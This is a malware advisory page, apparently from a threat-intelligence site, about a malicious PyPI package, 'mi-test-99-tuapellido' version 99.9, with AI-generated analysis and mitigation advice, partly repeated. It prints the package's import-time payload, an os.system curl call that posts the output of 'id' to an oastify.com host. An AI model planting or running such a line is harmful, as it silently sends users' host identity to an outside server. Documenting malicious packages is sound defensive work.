MAL-2026-6478: Malicious code in mi-test-99-tuapellido (PyPI)
The PyPI package 'mi-test-99-tuapellido' version 99.9 contains malicious code that executes on import. It runs a shell command that sends the output of the 'id' command (user and group identity information) to an attacker-controlled domain via an unencrypted HTTP POST request. The package metadata indicates it is a placeholder or proof-of-concept, consistent with dependency confusion or namespace squatting attacks. This behavior occurs without user consent or any legitimate functionality. The package is identified as malicious by multiple sources and is designed to exfiltrate basic host information.
AI Analysis
Technical Summary
The 'mi-test-99-tuapellido' PyPI package (version 99.9) contains a top-level __init__.py that executes 'os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)")' on import. This command sends the current user's identity information to a Burp Suite Collaborator-like service, confirming remote code execution and data exfiltration. The package metadata is placeholder text, indicating it is likely a test or proof-of-concept malicious package designed for dependency confusion or namespace squatting attacks. The package has no legitimate functionality and is flagged as malicious by OpenSSF Package Analysis and other sources.
Potential Impact
Importing or installing this package results in arbitrary shell command execution on the host system, specifically leaking user and group identity information to an attacker-controlled server over plaintext HTTP. This compromises confidentiality of host identity information and demonstrates an arbitrary code execution vector. Although the exfiltrated data is limited to basic host identity, the presence of arbitrary shell execution indicates a potentially serious security risk if used in a real attack scenario.
Mitigation Recommendations
No official patch or remediation is available for this package. The best mitigation is to avoid installing or importing 'mi-test-99-tuapellido' version 99.9. Users should verify package authenticity before installation and avoid packages with placeholder metadata or suspicious behavior. Since this is a malicious package on PyPI, removing it from the environment and blocking its installation is recommended. Monitor package sources and use dependency allowlists or trusted registries to prevent accidental installation.
MAL-2026-6478: Malicious code in mi-test-99-tuapellido (PyPI)
Description
The PyPI package 'mi-test-99-tuapellido' version 99.9 contains malicious code that executes on import. It runs a shell command that sends the output of the 'id' command (user and group identity information) to an attacker-controlled domain via an unencrypted HTTP POST request. The package metadata indicates it is a placeholder or proof-of-concept, consistent with dependency confusion or namespace squatting attacks. This behavior occurs without user consent or any legitimate functionality. The package is identified as malicious by multiple sources and is designed to exfiltrate basic host information.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The 'mi-test-99-tuapellido' PyPI package (version 99.9) contains a top-level __init__.py that executes 'os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)")' on import. This command sends the current user's identity information to a Burp Suite Collaborator-like service, confirming remote code execution and data exfiltration. The package metadata is placeholder text, indicating it is likely a test or proof-of-concept malicious package designed for dependency confusion or namespace squatting attacks. The package has no legitimate functionality and is flagged as malicious by OpenSSF Package Analysis and other sources.
Potential Impact
Importing or installing this package results in arbitrary shell command execution on the host system, specifically leaking user and group identity information to an attacker-controlled server over plaintext HTTP. This compromises confidentiality of host identity information and demonstrates an arbitrary code execution vector. Although the exfiltrated data is limited to basic host identity, the presence of arbitrary shell execution indicates a potentially serious security risk if used in a real attack scenario.
Mitigation Recommendations
No official patch or remediation is available for this package. The best mitigation is to avoid installing or importing 'mi-test-99-tuapellido' version 99.9. Users should verify package authenticity before installation and avoid packages with placeholder metadata or suspicious behavior. Since this is a malicious package on PyPI, removing it from the environment and blocking its installation is recommended. Monitor package sources and use dependency allowlists or trusted registries to prevent accidental installation.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-6478
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["PyPI"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a3ef7de27e9c797190262ae
Added to database: 06/26/2026, 22:06:22 UTC
Last enriched: 06/26/2026, 22:41:19 UTC
Last updated: 06/26/2026, 22:41:19 UTC
Views: 2
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.